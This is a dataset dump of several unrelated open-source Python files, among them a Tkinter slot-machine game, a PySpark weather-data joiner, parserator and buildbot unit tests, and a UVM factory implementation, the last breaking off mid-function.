self.BetTextLabel.place(x=170, y=260)\n\n #Changes the bet value\n def BetFiveButtonClick(self, event):\n self.BetTextLabel.configure(text = \" \", bg=\"#000000\")\n PlayerBet = 5\n self.BetTextLabel = Label(self.myContainer1)\n self.BetTextLabel.configure(text = (PlayerBet), fg=\"#FF4500\", bg=\"#000000\", font=\"DS_DIGI.TTF\")\n self.BetTextLabel.pack()\n self.BetTextLabel.place(x=170, y=260)\n \n #Changes the bet value\n def BetTenButtonClick(self, event):\n self.BetTextLabel.configure(text = \" \", bg=\"#000000\")\n PlayerBet = 10\n self.BetTextLabel = Label(self.myContainer1)\n self.BetTextLabel.configure(text = (PlayerBet), fg=\"#FF4500\", bg=\"#000000\", font=\"DS_DIGI.TTF\")\n self.BetTextLabel.pack()\n self.BetTextLabel.place(x=170, y=260)\n \n #Changes the bet value\n def BetFiftyButtonClick(self, event):\n self.BetTextLabel.configure(text = \" \", bg=\"#000000\")\n PlayerBet = 50\n self.BetTextLabel = Label(self.myContainer1)\n self.BetTextLabel.configure(text = (PlayerBet), fg=\"#FF4500\", bg=\"#000000\", font=\"DS_DIGI.TTF\")\n self.BetTextLabel.pack()\n self.BetTextLabel.place(x=170, y=260)\n \n #Changes the bet value\n def BetMaxButtonClick(self, event):\n self.BetTextLabel.configure(text = \" \", bg=\"#000000\")\n PlayerBet = 100\n self.BetTextLabel = Label(self.myContainer1)\n self.BetTextLabel.configure(text = (PlayerBet), fg=\"#FF4500\", bg=\"#000000\", font=\"DS_DIGI.TTF\")\n self.BetTextLabel.pack()\n self.BetTextLabel.place(x=170, y=260)\n \n \n#Main function \ndef main():\n #create a top-level window\n root = Tk()\n #call the MySlotmachine class\n myapp = MySlotMachine(root)\n #execute the mainloop method of the \"root\" object\n root.mainloop()\n\nif __name__ == \"__main__\": main()","repo_name":"GuidedBurrito/SlotMachine-Assignment2","sub_path":"SlotMachine/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":17752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"25677522905","text":"# -*- coding: utf-8 -*-\nfrom pyspark.sql.functions import when, col, lower\n\nthunderstorm = [\"thunderstorm with light rain\", \"thunderstorm with rain\",\n \"thunderstorm with heavy rain\", \"light thunderstorm\", \"thunderstorm\",\n \"heavy thunderstorm\" ,\"ragged thunderstorm\", \"thunderstorm with light drizzle\",\n \"thunderstorm with drizzle\", \"thunderstorm with heavy drizzle\",\n \"proximity thunderstorm with rain\", \"proximity thunderstorm with drizzle\",\n \"proximity thunderstorm\"]\n\ndrizzle = [\"light intensity drizzle\", \"drizzle\", \"heavy intensity drizzle\",\n \"light intensity drizzle rain\", \"drizzle rain\", \"heavy intensity drizzle rain\",\n \"shower rain and drizzle\", \"heavy shower rain and drizzle\", \"shower drizzle\"]\n\nrain = [\"light rain\", \"moderate rain\", \"heavy intensity rain\", \"very heavy rain\", \"extreme rain\",\n \"freezing rain\", \"light intensity shower rain\", \"shower rain\", \"heavy intensity shower rain\",\n \"ragged shower rain\", \"proximity shower rain\"]\n\nsnow = [\"light snow\", \"snow\", \"heavy snow\", \"sleet\", \"light shower sleet\", \"shower sleet\",\n \"light rain and snow\", \"rain and snow\", \"light shower snow\", \"shower snow\",\n \"heavy shower snow\"]\n\natmosphere = [\"mist\", \"smoke\", \"haze\", \"sand/ dust whirls\", \"fog\", \"sand\", \"dust\",\n \"Ash volcanic ash\", \"squalls\", \"tornado\"]\n\nclear = [\"clear sky\"]\n\nclouds = [\"few clouds\", \"scattered clouds\", \"broken clouds\", \"overcast clouds\"]\n\n\nclass TemperatureDataframe():\n\n def __init__(self, spark):\n self.spark = spark\n\n def read(self, path):\n\n dataframe = self.spark.read.format(\"csv\") \\\n .option(\"header\", \"true\") \\\n .load(path) \\\n .select(\"datetime\", \"Chicago\")\n\n return dataframe\n\n def create_new_columns(self, dataframe):\n\n thunderstorm_broadcast = self.spark.sparkContext.broadcast(thunderstorm)\n drizzle_broadcast = self.spark.sparkContext.broadcast(drizzle)\n rain_broadcast = self.spark.sparkContext.broadcast(rain)\n snow_broadcast = self.spark.sparkContext.broadcast(snow)\n atmosphere_broadcast = self.spark.sparkContext.broadcast(atmosphere)\n clear_broadcast = self.spark.sparkContext.broadcast(clear)\n clouds_broadcast = self.spark.sparkContext.broadcast(clouds)\n\n dataframe = dataframe.withColumn(\"weather_condition\", when(col(\"weather_description\").isin(thunderstorm_broadcast.value), \"Thunderstorm\")\\\n .otherwise(when(lower(col(\"weather_description\")).isin(drizzle_broadcast.value), \"Drizzle\")\\\n .otherwise(when(lower(col(\"weather_description\")).isin(rain_broadcast.value), \"Rain\")\\\n .otherwise(when(lower(col(\"weather_description\")).isin(snow_broadcast.value), \"Snow\")\\\n .otherwise(when(lower(col(\"weather_description\")).isin(atmosphere_broadcast.value), \"Atmosphere\")\\\n .otherwise(when(lower(col(\"weather_description\")).isin(clear_broadcast.value), \"Clear\")\\\n .otherwise(when(lower(col(\"weather_description\")).isin(clouds_broadcast.value), \"Clouds\")\\\n .otherwise(\"Clouds\"))))))))\n\n return dataframe\n\n def create(self):\n\n humidity = self.read(\"hdfs:///user/labdata/csv/humidity.csv\")\\\n .withColumnRenamed(\"Chicago\", \"humidity\")\n pressure = self.read(\"hdfs:///user/labdata/csv/pressure.csv\") \\\n .withColumnRenamed(\"Chicago\", \"pressure\")\n temperature = self.read(\"hdfs:///user/labdata/csv/temperature.csv\") \\\n .withColumnRenamed(\"Chicago\", \"temperature\")\n wind_speed = self.read(\"hdfs:///user/labdata/csv/wind_speed.csv\")\\\n .withColumnRenamed(\"Chicago\", \"wind_speed\")\n weather_description_read = self.read(\"hdfs:///user/labdata/csv/weather_description.csv\")\\\n .withColumn(\"Chicago\",\n when(col(\"Chicago\") == \"sky is clear\", \"clear sky\")\n .otherwise(col(\"Chicago\")))\\\n .withColumnRenamed(\"Chicago\", \"weather_description\")\n weather_description = self.create_new_columns(weather_description_read)\n\n dataframe = humidity\\\n .join(pressure, humidity.datetime == pressure.datetime) \\\n .join(temperature, humidity.datetime == temperature.datetime) \\\n .join(weather_description, humidity.datetime == weather_description.datetime) \\\n .join(wind_speed, humidity.datetime == wind_speed.datetime) \\\n .select(humidity.datetime,\n humidity.humidity,\n pressure.pressure,\n temperature.temperature,\n weather_description.weather_condition.alias(\"weather_description\"),\n wind_speed.wind_speed)\n\n return dataframe\n","repo_name":"fabions83/ProjetoFinal-FIA","sub_path":"divvy_bikes/ingestion/temperature.py","file_name":"temperature.py","file_ext":"py","file_size_in_byte":5016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"4563282576","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import print_function\nfrom parserator import data_prep_utils\nfrom lxml import etree\nimport unittest\n\nclass Mock(object):\n pass\n\nclass TestList2XML(unittest.TestCase):\n def setUp(self):\n mock_module = Mock()\n mock_module.GROUP_LABEL = 'Collection'\n mock_module.PARENT_LABEL = 'TokenSequence'\n self.training_data = data_prep_utils.TrainingData(None, mock_module)\n\n def test_xml(self):\n self.XMLequals( [('#', 'foo'), ('1', 'foo'), ('Pinto', 'foo')], '# 1 Pinto')\n self.XMLequals( [('&', 'foo'), ('1', 'foo'), ('Pinto', 'foo')], '& 1 Pinto')\n\n\n def test_none_tag(self):\n self.XMLequals( [('Box', 'foo'), ('#', 'Null'), ('1', 'foo'), ('Pinto', 'foo')], 'Box # 1 Pinto')\n self.XMLequals( [('#', 'Null'), ('1', 'foo'), ('Pinto', 'foo')], '# 1 Pinto')\n\n def test_ampersand(self):\n assert self.training_data._xml_to_sequence(self.training_data._sequence_to_xml([('&', 'foo')])) == (('&', 'foo'),)\n \n def XMLequals(self, labeled_sequence, xml):\n correct_xml = '' + xml + ''\n generated_xml = etree.tostring(self.training_data._sequence_to_xml(labeled_sequence)).decode()\n print('Correct: %s' %correct_xml)\n print('Generated: %s' %generated_xml)\n assert correct_xml == generated_xml\n\n\nif __name__ == '__main__' :\n unittest.main() \n","repo_name":"datamade/parserator","sub_path":"tests/test_xml.py","file_name":"test_xml.py","file_ext":"py","file_size_in_byte":1591,"program_lang":"python","lang":"en","doc_type":"code","stars":779,"dataset":"github-code","pt":"60"} +{"seq_id":"38909657273","text":"from buildbot.process.results import SKIPPED, SUCCESS\nfrom buildbot.test.fake.remotecommand import ExpectShell\nfrom buildbot.test.util import steps\nfrom buildbot.test.util.misc import TestReactorMixin\nfrom twisted.trial import unittest\n\nfrom eve.steps.redhat import UnregisterRedhat\nfrom eve.util.redhat import isRedhat\n\n\nclass TestUnregisterRedhat(steps.BuildStepMixin, TestReactorMixin,\n unittest.TestCase):\n\n def setUp(self):\n self.setUpTestReactor()\n return self.setUpBuildStep()\n\n def tearDown(self):\n return self.tearDownBuildStep()\n\n def test_success(self):\n self.setupStep(UnregisterRedhat())\n\n self.expectCommands(\n ExpectShell(workdir='wkdir',\n command='sudo subscription-manager unregister')\n + 0\n )\n self.expectOutcome(\n result=SUCCESS,\n state_string=\"Unregistered from Red Hat Customer Portal\"\n )\n return self.runStep()\n\n def test_skipped(self):\n command = \"rpm -qa | grep -qE '^redhat-release.+'\"\n self.setupStep(UnregisterRedhat(doStepIf=isRedhat))\n self.expectCommands(\n ExpectShell(workdir='/', command=command) + 1\n )\n self.expectOutcome(result=SKIPPED)\n return self.runStep()\n","repo_name":"scality/eve","sub_path":"tests/unit/steps/test_redhat.py","file_name":"test_redhat.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"11282246144","text":"from typing import List, Optional\n\nfrom .sv import sv\nfrom .uvm_queue import UVMQueue\nfrom .uvm_pool import UVMPool\nfrom .uvm_globals import (uvm_report_error, uvm_report_fatal, uvm_report_warning,\n uvm_is_match, uvm_report_info)\nfrom .uvm_object_globals import UVM_NONE, UVM_MEDIUM, UVM_HIGH\nfrom ..macros import uvm_info\nfrom ..uvm_macros import UVM_STRING_QUEUE_STREAMING_PACK\n\n\n\ndef m_has_wildcard(nm: str) -> bool:\n \"\"\" Returns True if given string has wildcard * or ? \"\"\"\n for char in nm:\n if char == \"*\" or char == \"?\":\n return True\n return False\n\n\nclass uvm_factory_queue_class:\n def __init__(self):\n self.queue = UVMQueue()\n\n#\n# CLASS- UVMFactoryOverride\n#\n# Internal class. Data structure for factory overrides to store all override\n# related information.\n\nclass UVMFactoryOverride:\n\n\n def __init__(self, full_inst_path=\"\", orig_type_name=\"\", orig_type=None,\n ovrd_type=None):\n if ovrd_type is None:\n uvm_report_fatal(\"NULLWR\",\n \"Attempting to register a null override object with the factory\", UVM_NONE)\n self.full_inst_path = full_inst_path\n self.orig_type_name = orig_type_name\n if orig_type is not None:\n self.orig_type_name = orig_type.get_type_name()\n\n self.orig_type = orig_type\n self.ovrd_type_name = ovrd_type.get_type_name()\n self.ovrd_type = ovrd_type\n self.selected = False\n self.used = 0\n\n\n\nclass UVMFactory:\n \"\"\"\n UVMFactory is used to create objects of type `UVMComponent` and\n `UVMObject` (and their derived user-defined types).\n Object and component types are registered\n with the factory using lightweight proxies to the actual objects and\n components being created. The `UVMObjectRegistry` and\n `UVMComponentRegistry` class are used to proxy `UVMObject`\n and `UVMComponent`.\n\n The factory provides both name-based and type-based interfaces.\n\n type-based - The type-based interface is far less prone to errors in usage.\n\n name-based - The name-based interface is dominated\n by string arguments that can be misspelled and provided in the wrong order.\n Errors in name-based requests might only be caught at the time of the call,\n if at all.\n\n The `UVMFactory` is an abstract class. The UVM uses the `UVMDefaultFactory` class\n as its default factory implementation.\n\n See `UVMDefaultFactory` section for details on configuring and using the factory.\n \"\"\"\n\n #// Group: Retrieving the factory\n\n @classmethod\n def get(cls) -> 'UVMFactory':\n \"\"\"\n Function: get\n Static accessor for `UVMFactory`\n\n The static accessor is provided as a convenience wrapper\n around retrieving the factory via the `UVMCoreService.get_factory`\n method.\n\n .. code-block:: python\n\n # Using the uvm_coreservice_t:\n cs = UVMCoreService.get()\n f = cs.get_factory()\n\n .. code-block:: python\n\n # Not using the uvm_coreservice_t:\n f = UVMFactory.get()\n\n Returns:\n UVMFactory: Singleton instace of the factory\n \"\"\"\n from .uvm_coreservice import UVMCoreService\n cs = UVMCoreService.get()\n return cs.get_factory()\n\n # NOTE: SV virtual functions not added from original uvm_factory, not needed in python\n\n#\n# CLASS: uvm_default_factory\n#\n# Default implementation of the UVM factory.\n\n\nclass UVMDefaultFactory(UVMFactory):\n\n m_debug_pass = False\n\n def __init__(self):\n self.m_override_info: List[UVMFactoryOverride] = []\n self.m_types = UVMPool() # [uvm_object_wrapper] -> bit\n self.m_lookup_strs = UVMPool()\n self.m_type_names = UVMPool()\n self.m_type_overrides: List[UVMFactoryOverride] = []\n self.m_inst_override_queues = {} # [uvm_object_wrapper] -> queue\n self.m_inst_override_name_queues = {} # [string] -> queue\n self.m_wildcard_inst_overrides = UVMQueue()\n\n\n def register(self, obj) -> None:\n \"\"\"\n Group: Registering Types\n\n Function: register\n\n Registers the given proxy object, `obj`, with the factory.\n Args:\n obj:\n \"\"\"\n if obj is None:\n uvm_report_fatal(\"NULLWR\",\n \"Attempting to register a null object with the factory\")\n\n if obj.get_type_name() != \"\" and obj.get_type_name() != \"\":\n if self.m_type_names.exists(obj.get_type_name()):\n uvm_report_warning(\"TPRGED\", (\"Type name '\" + obj.get_type_name()\n + \"' already registered with factory. No string-based lookup \"\n + \"support for multiple types with the same type name.\"), UVM_NONE)\n else:\n self.m_type_names.add(obj.get_type_name(), obj)\n\n if self.m_types.exists(obj):\n if obj.get_type_name() != \"\" and obj.get_type_name() != \"\":\n uvm_report_warning(\"TPRGED\", (\"Object type '\" + obj.get_type_name()\n + \"' already registered with factory. \"), UVM_NONE)\n else:\n self.m_types.add(obj, 1)\n # If a named override happens before the type is registered, need to copy\n # the override queue.\n # Note:Registration occurs via static initialization, which occurs ahead of\n # procedural (e.g. initial) blocks. There should not be any preexisting overrides.\n tname = obj.get_type_name()\n if obj.get_type_name() in self.m_inst_override_name_queues:\n self.m_inst_override_queues[obj] = UVMQueue()\n self.m_inst_override_queues[obj] = self.m_inst_override_name_queues[tname]\n del self.m_inst_override_name_queues[tname]\n if self.m_wildcard_inst_overrides.size():\n if obj not in self.m_inst_override_queues:\n self.m_inst_override_queues[obj] = UVMQueue()\n for i in range(0, self.m_wildcard_inst_overrides.size()):\n wc_inst_override = self.m_wildcard_inst_overrides[i]\n if uvm_is_match(wc_inst_override.orig_type_name, tname):\n self.m_inst_override_queues[obj].push_back(wc_inst_override)\n\n def set_type_override_by_type(self, original_type, override_type,\n replace=True):\n \"\"\"\n set_type_override_by_type\n\n #def set_type_override_by_type (uvm_object_wrapper original_type,\n uvm_object_wrapper override_type,\n bit replace=1)\n Args:\n original_type:\n override_type:\n replace:\n \"\"\"\n replaced = False\n\n # check that old and new are not the same\n if original_type == override_type:\n if original_type.get_type_name() == \"\" or original_type.get_type_name() == \"\":\n uvm_report_warning(\"TYPDUP\", \"Original and override type \"\n + \"arguments are identical\", UVM_NONE)\n else:\n uvm_report_warning(\"TYPDUP\", \"Original and override type \"\n + \"arguments are identical: \"\n + original_type.get_type_name(), UVM_NONE)\n\n # register the types if not already done so, for the benefit of string-based lookup\n if not self.m_types.exists(original_type):\n self.register(original_type)\n\n if not self.m_types.exists(override_type):\n self.register(override_type)\n\n # check for existing type override\n for index in range(len(self.m_type_overrides)):\n idx_orig_type = self.m_type_overrides[index].orig_type\n idx_type_name = self.m_type_overrides[index].orig_type_name\n if (idx_orig_type == original_type or\n (idx_type_name != \"\" and\n idx_type_name != \"\" and\n idx_type_name == original_type.get_type_name())):\n\n msg = (\"Original object type '\" + original_type.get_type_name()\n + \"' already registered to produce '\"\n + self.m_type_overrides[index].ovrd_type_name + \"'\")\n if replace is False:\n msg = msg + \". Set 'replace' argument to replace the existing entry.\"\n uvm_report_info(\"TPREGD\", msg, UVM_MEDIUM)\n return\n\n msg = (msg + \". Replacing with override to produce type '\"\n + override_type.get_type_name() + \"'.\")\n uvm_report_info(\"TPREGR\", msg, UVM_MEDIUM)\n replaced = True\n self.m_type_overrides[index].orig_type = original_type\n self.m_type_overrides[index].orig_type_name = original_type.get_type_name()\n self.m_type_overrides[index].ovrd_type = override_type\n self.m_type_overrides[index].ovrd_type_name = override_type.get_type_name()\n\n\n\n # make a new entry\n if replaced is False:\n # uvm_factory_override override\n override = UVMFactoryOverride(orig_type=original_type,\n orig_type_name=original_type.get_type_name(),\n full_inst_path=\"*\",\n ovrd_type=override_type)\n\n self.m_type_overrides.append(override)\n\n\n def set_type_override_by_name(self, original_type_name, override_type_name,\n replace=True):\n \"\"\"\n set_type_override_by_name\n\n Args:\n original_type_name:\n override_type_name:\n replace:\n \"\"\"\n replaced = False\n original_type = None\n override_type = None\n\n if self.m_type_names.exists(original_type_name):\n original_type = self.m_type_names.get(original_type_name)\n\n if self.m_type_names.exists(override_type_name):\n override_type = self.m_type_names.get(override_type_name)\n\n # check that type is registered with the factory\n if override_type is None:\n uvm_report_error(\"TYPNTF\", (\"Cannot register override for original type '\"\n + original_type_name + \"' because the override type '\"\n + override_type_name + \"' is not registered with the factory.\"), UVM_NONE)\n return\n\n # check that old and new are not the same\n if original_type_name == override_type_name:\n uvm_report_warning(\"TYPDUP\", (\"Requested and actual type name \"\n + \" arguments are identical: \" + original_type_name\n + \". Ignoring this override.\"), UVM_NONE)\n return\n\n for index in range(0, len(self.m_type_overrides)):\n ovrd_type_name = self.m_type_overrides[index].ovrd_type_name\n if self.m_type_overrides[index].orig_type_name == original_type_name:\n if not replace:\n uvm_report_info(\"TPREGD\", (\"Original type '\" + original_type_name\n + \"' already registered to produce '\" + ovrd_type_name\n + \"'. Set 'replace' argument to replace the existing entry.\"), UVM_MEDIUM)\n return\n\n uvm_report_info(\"TPREGR\", (\"Original object type '\" + original_type_name\n + \"' already registered to produce '\" + ovrd_type_name\n + \"'. Replacing with override to produce type '\"\n + override_type_name + \"'.\"), UVM_MEDIUM)\n replaced = True\n self.m_type_overrides[index].ovrd_type = override_type\n self.m_type_overrides[index].ovrd_type_name = override_type_name\n\n if original_type is None:\n self.m_lookup_strs[original_type_name] = 1\n\n if not replaced:\n # uvm_factory_override override\n override = UVMFactoryOverride(orig_type=original_type,\n orig_type_name=original_type_name,\n full_inst_path=\"*\",\n ovrd_type=override_type)\n\n self.m_type_overrides.append(override)\n self.m_type_names.add(original_type_name, override.ovrd_type)\n\n def check_inst_override_exists(self, original_type, override_type,\n full_inst_path):\n \"\"\"\n check_inst_override_exists\n\n #def check_inst_override_exists (uvm_object_wrapper original_type,\n uvm_object_wrapper override_type,\n string full_inst_path)\n Args:\n original_type:\n override_type:\n full_inst_path:\n Returns:\n \"\"\"\n override = None # uvm_factory_override\n qc = None # uvm_factory_queue_class\n\n if original_type in self.m_inst_override_queues:\n qc = self.m_inst_override_queues[original_type]\n else:\n return 0\n\n for index in range(len(qc.queue)):\n override = qc.queue[index]\n if (override.full_inst_path == full_inst_path and\n override.orig_type == original_type and\n override.ovrd_type == override_type and\n override.orig_type_name == original_type.get_type_name()):\n uvm_report_info(\"DUPOVRD\", \"Instance override for '\"\n + original_type.get_type_name() + \"' already exists: override type '\"\n + override_type.get_type_name() + \"' with full_inst_path '\"\n + full_inst_path + \"'\", UVM_HIGH)\n return 1\n return 0\n\n\n def set_inst_override_by_type(self, original_type, override_type,\n full_inst_path):\n \"\"\"\n set_inst_override_by_type\n\n #def set_inst_override_by_type (uvm_object_wrapper original_type,\n uvm_object_wrapper override_type,\n string full_inst_path)\n Args:\n original_type:\n override_type:\n full_inst_path:\n \"\"\"\n\n override = None # uvm_factory_override\n\n # register the types if not already done so\n if not self.m_types.exists(original_type):\n self.register(original_type)\n\n if not self.m_types.exists(override_type):\n self.register(override_type)\n\n if self.check_inst_override_exists(original_type,override_type,full_inst_path):\n return\n\n if original_type not in self.m_inst_override_queues:\n self.m_inst_override_queues[original_type] = UVMQueue()\n\n override = UVMFactoryOverride(full_inst_path=full_inst_path,\n orig_type=original_type,\n orig_type_name=original_type.get_type_name(),\n ovrd_type=override_type)\n\n\n self.m_inst_override_queues[original_type].push_back(override)\n\n\n # set_inst_override_by_name\n # TODO\n #function void uvm_default_factory::set_inst_override_by_name (\n # string original_type_name,\n # string override_type_name,\n # string full_inst_path)\n #\n # uvm_factory_override override\n # uvm_object_wrapper original_type\n # uvm_object_wrapper override_type\n #\n # if(self.m_type_names.exists(original_type_name))\n # original_type = self.m_type_names[original_type_name]\n #\n # if(self.m_type_names.exists(override_type_name))\n # override_type = self.m_type_names[override_type_name]\n #\n # // check that type is registered with the factory\n # if (override_type is None):\n # uvm_report_error(\"TYPNTF\", {\"Cannot register instance override with type name '\",\n # original_type_name,\"' and instance path '\",full_inst_path,\"' because the type it's supposed \",\n # \"to produce, '\",override_type_name,\"', is not registered with the factory.\"}, UVM_NONE)\n # return\n # end\n #\n # if (original_type is None)\n # m_lookup_strs[original_type_name] = 1\n #\n # override = new(.full_inst_path(full_inst_path),\n # .orig_type(original_type),\n # .orig_type_name(original_type_name),\n # .ovrd_type(override_type))\n #\n # if(original_type != null):\n # if (check_inst_override_exists(original_type,override_type,full_inst_path))\n # return\n # if(!m_inst_override_queues.exists(original_type))\n # m_inst_override_queues[original_type] = new\n # m_inst_override_queues[original_type].queue.push_back(override)\n # end\n # else:\n # if(m_has_wildcard(original_type_name)):\n # foreach(self.m_type_names[i]):\n # if(uvm_is_match(original_type_name,i)):\n # this.set_inst_override_by_name(i, override_type_name, full_inst_path)\n # end\n # end\n # m_wildcard_inst_overrides.push_back(override)\n # end\n # else:\n # if(!self.m_inst_override_name_queues.exists(original_type_name))\n # self.m_inst_override_name_queues[original_type_name] = new\n # self.m_inst_override_name_queues[original_type_name].queue.push_back(override)\n # end\n # end\n #\n #endfunction\n\n def create_object_by_name(self, requested_type_name, parent_inst_path=\"\",\n name=\"\"):\n \"\"\"\n create_object_by_name\n\n Args:\n requested_type_name:\n parent_inst_path:\n name:\n Returns:\n \"\"\"\n inst_path = self._get_inst_path(parent_inst_path, name)\n\n self.m_override_info.clear()\n wrapper = self.find_override_by_name(requested_type_name, inst_path)\n\n # if no override exists, try to use requested_type_name directly\n if wrapper is None:\n if not self.m_type_names.exists(requested_type_name):\n uvm_report_warning(\"BDTYP\", (\"Cannot create an object of type '\"\n + requested_type_name + \"' because it is not registered with the factory.\"),\n UVM_NONE)\n return None\n wrapper = self.m_type_names.get(requested_type_name)\n return wrapper.create_object(name)\n\n def create_object_by_type(self, requested_type, parent_inst_path=\"\", name=\"\"):\n \"\"\"\n create_object_by_type\n\n Args:\n requested_type:\n parent_inst_path:\n name:\n Returns:\n \"\"\"\n if requested_type is None:\n uvm_report_fatal(\"REQ_TYPE_NONE\", \"Requested type object was None\")\n full_inst_path = self._get_inst_path(parent_inst_path, name)\n\n self.m_override_info.clear()\n requested_type = self.find_override_by_type(requested_type, full_inst_path)\n if requested_type is None:\n uvm_report_fatal(\"REQ_TYPE_NONE\", \"Requested type object was None after override\")\n return requested_type.create_object(name)\n\n def _get_inst_path(self, parent_inst_path, name):\n inst_path = \"\"\n if parent_inst_path == \"\":\n inst_path = name\n elif name != \"\":\n inst_path = parent_inst_path + \".\" + name\n else:\n inst_path = parent_inst_path\n return inst_path\n\n def create_component_by_name(self, requested_type_name,\n parent_inst_path, name, parent):\n \"\"\"\n create_component_by_name\n\n Args:\n requested_type_name:\n parent_inst_path:\n name:\n parent:\n Returns:\n \"\"\"\n\n inst_path = self._get_inst_path(parent_inst_path, name)\n\n self.m_override_info.clear()\n wrapper = self.find_override_by_name(requested_type_name, inst_path)\n\n # if no override exists, try to use requested_type_name directly\n if wrapper is None:\n if not self.m_type_names.exists(requested_type_name):\n uvm_report_warning(\"BDTYP\", (\"Cannot create a component of type '\"\n + requested_type_name + \"' because it is not registered with the factory.\"),\n UVM_NONE)\n return None\n wrapper = self.m_type_names.get(requested_type_name)\n\n return wrapper.create_component(name, parent)\n\n def create_component_by_type(self, requested_type, parent_inst_path, name,\n parent):\n \"\"\"\n create_component_by_type\n\n Args:\n requested_type:\n parent_inst_path:\n name:\n parent:\n Returns:\n \"\"\"\n full_inst_path = self._get_inst_path(parent_inst_path, name)\n\n self.m_override_info.clear()\n requested_type = self.find_override_by_type(requested_type, full_inst_path)\n return requested_type.create_component(name, parent)\n\n # find_wrapper_by_name\n # TODO\n def find_wrapper_by_name(self, type_name: str) -> Optional['UVMObjectWrapper']:\n if self.m_type_names.exists(type_name):\n return self.m_type_names[type_name]\n uvm_report_warning(\"UnknownTypeName\", (\"find_wrapper_by_name: Type name '\"\n + type_name + \"' not registered with the factory.\"), UVM_NONE)\n\n def find_override_by_name(\n self, requested_type_name, full_inst_path) -> Optional['UVMObjectWrapper']:\n \"\"\"\n find_override_by_name\n\n Args:\n requested_type_name (str):\n full_inst_path (str):\n Returns:\n UVMObjectWrapper\n \"\"\"\n rtype = None\n qc = UVMQueue()\n lindex = None\n override = None\n\n if self.m_type_names.exists(requested_type_name):\n rtype = self.m_type_names.get(requested_type_name)\n\n if full_inst_path != \"\":\n if rtype is None:\n if requested_type_name in self.m_inst_override_name_queues:\n qc = self.m_inst_override_name_queues[requested_type_name]\n else:\n if rtype in self.m_inst_override_queues:\n qc = self.m_inst_override_queues[rtype]\n\n if qc is not None:\n for index in range(0, qc.size()):\n match_ok = uvm_is_match(qc[index].orig_type_name, requested_type_name)\n if match_ok and uvm_is_match(qc[index].full_inst_path, full_inst_path):\n self.m_override_info.append(qc[index])\n if UVMDefaultFactory.m_debug_pass:\n if override is None:\n override = qc[index].ovrd_type\n qc[index].selected = 1\n lindex = qc[index]\n else:\n qc[index].used += 1\n if qc[index].ovrd_type.get_type_name() == requested_type_name:\n return qc[index].ovrd_type\n else:\n return self.find_override_by_type(qc[index].ovrd_type,full_inst_path)\n\n ovrd_ok = rtype not in self.m_inst_override_queues and self.m_wildcard_inst_overrides.size() > 0\n if rtype is not None and ovrd_ok:\n self.m_inst_override_queues[rtype] = UVMQueue()\n for i in range(0, self.m_wildcard_inst_overrides.size()):\n if uvm_is_match(self.m_wildcard_inst_overrides.get(i).orig_type_name,\n requested_type_name):\n self.m_inst_override_queues[rtype].push_back(self.m_wildcard_inst_overrides.get(i))\n\n # type override - exact match\n for index in range(0, len(self.m_type_overrides)):\n if self.m_type_overrides[index].orig_type_name == requested_type_name:\n self.m_override_info.append(self.m_type_overrides[index])\n if UVMDefaultFactory.m_debug_pass:\n if override is None:\n override = self.m_type_overrides[index].ovrd_type\n self.m_type_overrides[index].selected = 1\n lindex = self.m_type_overrides[index]\n else:\n self.m_type_overrides[index].used += 1\n return self.find_override_by_type(self.m_type_overrides[index].ovrd_type,full_inst_path)\n\n if UVMDefaultFactory.m_debug_pass and override is not None:\n lindex.used += 1\n return self.find_override_by_type(override, full_inst_path)\n\n # No override found\n return None\n\n def find_override_by_type(self, requested_type, full_inst_path):\n \"\"\"\n find_override_by_type\n\n Args:\n requested_type:\n full_inst_path:\n Returns:\n \"\"\"\n override = None\n lindex = None\n qc = None\n if requested_type in self.m_inst_override_queues:\n qc = self.m_inst_override_queues[requested_type]\n\n for index in range(0, len(self.m_override_info)):\n if self.m_override_info[index].orig_type == requested_type:\n uvm_report_error(\"OVRDLOOP\", \"Recursive loop detected while finding override.\", UVM_NONE)\n if UVMDefaultFactory.m_debug_pass is False:\n self.debug_create_by_type(requested_type, full_inst_path)\n\n self.m_override_info[index].used += 1\n return requested_type\n\n # inst override; return first match; takes precedence over type overrides\n if full_inst_path != \"\" and qc is not None:\n for index in range(0, qc.size()):\n if self.are_args_ok(qc[index], requested_type, full_inst_path):\n self.m_override_info.append(qc[index])\n if UVMDefaultFactory.m_debug_pass:\n if override is None:\n override = qc[index].ovrd_type\n qc[index].selected = 1\n lindex = qc[index]\n else:\n qc[index].used += 1\n if qc[index].ovrd_type == requested_type:\n return requested_type\n else:\n return self.find_override_by_type(qc[index].ovrd_type,full_inst_path)\n\n # type override - exact match\n for index in range(0, len(self.m_type_overrides)):\n if self.args_are_ok_again(self.m_type_overrides[index],requested_type):\n self.m_override_info.append(self.m_type_overrides[index])\n if UVMDefaultFactory.m_debug_pass:\n if override is None:\n override = self.m_type_overrides[index].ovrd_type\n self.m_type_overrides[index].selected = 1\n lindex = self.m_type_overrides[index]\n else:\n self.m_type_overrides[index].used += 1\n if self.m_type_overrides[index].ovrd_type == requested_type:\n return requested_type\n else:\n return self.find_override_by_type(self.m_type_overrides[index].ovrd_type,\n full_inst_path)\n\n if UVMDefaultFactory.m_debug_pass and override is not None:\n lindex.used += 1\n if override == requested_type:\n return requested_type\n else:\n return self.find_override_by_type(override,full_inst_path)\n\n return requested_type\n #endfunction\n\n def convert2string(self, all_types=True) -> str:\n \"\"\"\n tpoikela: Added this to access factory string repr without print()\n\n Args:\n all_types (bool): If True, adds all possible types\n Returns:\n str: Factory converted to string\n \"\"\"\n key = \"\"\n sorted_override_queues = {} # uvm_factory_queue_class s[string]\n qs = UVMQueue()\n tmp = \"\"\n id = 0\n obj = None # uvm_object_wrapper obj\n\n # sort the override queues\n for key in self.m_inst_override_queues:\n obj = self.m_inst_override_queues[key]\n tmp = obj.get_type_name()\n if tmp == \"\":\n tmp = \"__unnamed_id_\" + str(id)\n id += 1\n sorted_override_queues[tmp] = self.m_inst_override_queues[key]\n\n for key in self.m_inst_override_name_queues:\n sorted_override_queues[key] = self.m_inst_override_name_queues[key]\n\n qs.push_back(\"\\n#### Factory Configuration (*)\\n\\n\")\n\n # print instance overrides\n if len(self.m_type_overrides) == 0 and len(sorted_override_queues) == 